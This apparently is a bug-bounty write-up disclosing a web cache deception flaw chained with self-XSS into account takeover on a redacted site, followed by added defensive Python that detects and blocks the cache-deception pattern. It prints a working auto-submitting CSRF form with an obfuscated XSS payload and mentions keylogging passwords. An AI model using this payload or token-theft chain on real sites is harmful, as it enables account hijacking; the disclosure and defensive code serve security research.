@bxmbn
This is the second part of my previous Write-Up
So, way back in July, I started testing an app. I noticed the app was behind Akamai. I then created an account and noticed there was a Self-XSS when updating the name.
So, to exploit this I just needed to extract the user's CSRF token by sending the victim a modified URL with a cacheable file extension (.js, .css, .woff2), so the server caches the response.
Example URL:
https://www.███████/my-account/personal-information.woff2?triagethis
After I extracted the CSRF token, I was then able to send the XSS payload to the victim:
<html>
<body onload="xss.submit();">
  <form method="POST"
        action="https://www.█████████/my-account/update-profile"
        id="xss"
        style="display:none">
    <input type="hidden" name="CSRFToken" value="replace your stolen token here">
    <input type="hidden" name="lname" value="Oauth">
    <input type="hidden" name="zipcode" value="07801">
    <input type="hidden" name="fname" value="xss","a":top[8680439..toString(30)](document.domain),//">
    <input type="hidden" name="dobField" value="04/06/1994">
    <input type="submit">
  </form>
</body>
</html>
Payload used:
xss","a":top[8680439..toString(30)](document.domain),//
I then showed that there were two ways to perform Account Takeover with this exploit: one was just by changing the email with the stolen CSRF token and requesting a new password; the other was to use JS to extract the password with a keylogger, as the payload was rendered on multiple other pages.
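The chain above rests on one origin-side weakness: a personalized account page is served under any URL suffix, so a CDN that decides cacheability by extension stores a private response. The following is an added example (not code from the write-up or the affected app) showing the defender's side: exact-match routing that returns 404 for suffixed paths, no-store headers forced on every private route, and a triage helper that scans access-log lines for private paths requested with a static-asset extension. All routes, prefixes and log lines are constructed for illustration, and the domain is omitted on purpose.

```python
"""Defensive checks for the web-cache-deception pattern described above.
Added example. Routes, prefixes and log lines are constructed (hypothetical)."""
import re
from urllib.parse import urlsplit

# Hypothetical account routes. Assumption: the app dispatches on exact path match.
KNOWN_ROUTES = {
    "/my-account/personal-information": "account_page",
    "/my-account/update-profile": "update_profile",
}
# URL prefixes whose responses carry per-user data and must never sit in a shared cache.
PRIVATE_PREFIXES = ("/my-account/",)
# Extensions a CDN commonly treats as static and caches by default.
STATIC_EXTENSIONS = {".js", ".css", ".woff", ".woff2", ".png", ".jpg", ".svg", ".ico"}

# Matches the request line and status of a common-log-format entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def resolve_route(path):
    """Exact-match dispatch: '/my-account/personal-information.woff2' is not a
    known route, so None (a 404) is returned instead of the account page."""
    return KNOWN_ROUTES.get(path)


def private_response_headers(path, headers=None):
    """Force no-store on every private route, whatever the URL suffix, so a
    shared cache that misclassifies the URL still refuses to keep the body."""
    out = dict(headers or {})
    if path.startswith(PRIVATE_PREFIXES):
        out["Cache-Control"] = "no-store, private"
        out["Pragma"] = "no-cache"
    return out


def looks_like_cache_deception(url):
    """True when a private path is requested with a static-asset extension."""
    path = urlsplit(url).path.lower()
    if not path.startswith(PRIVATE_PREFIXES):
        return False
    ext = re.search(r"(\.[a-z0-9]+)$", path)
    return bool(ext) and ext.group(1) in STATIC_EXTENSIONS


def triage_log(lines):
    """Return (url, status) for matching requests that were served 200:
    those are the responses a shared cache may now be holding."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        if looks_like_cache_deception(m["url"]) and m["status"] == "200":
            hits.append((m["url"], int(m["status"])))
    return hits


# Constructed access-log lines (documentation IPs, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Jul/2022:10:00:00 +0000] "GET /my-account/personal-information HTTP/1.1" 200 5120',
    '203.0.113.5 - - [17/Jul/2022:10:00:03 +0000] "GET /my-account/personal-information.woff2?triagethis HTTP/1.1" 200 5120',
    '198.51.100.9 - - [17/Jul/2022:10:00:07 +0000] "GET /static/app.css HTTP/1.1" 200 880',
    '203.0.113.5 - - [17/Jul/2022:10:00:09 +0000] "GET /my-account/update-profile.js HTTP/1.1" 404 120',
]

if __name__ == "__main__":
    for url, status in triage_log(SAMPLE_LOG):
        print("possible cache deception served 200:", url)
    print(private_response_headers("/my-account/personal-information"))
```

Run stand-alone it reports the second log line only: the suffixed account URL that the origin answered with 200, which is the request a cache-by-extension rule would have stored. The fourth line is ignored because the origin already returned 404, which is what resolve_route enforces.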
Timeline:
Reported → July 17, 2022
Pending Program Review→ July 20, 2022
Bounty Awarded → August 15, 2022
Next: Attacking Amazon CloudFront CDN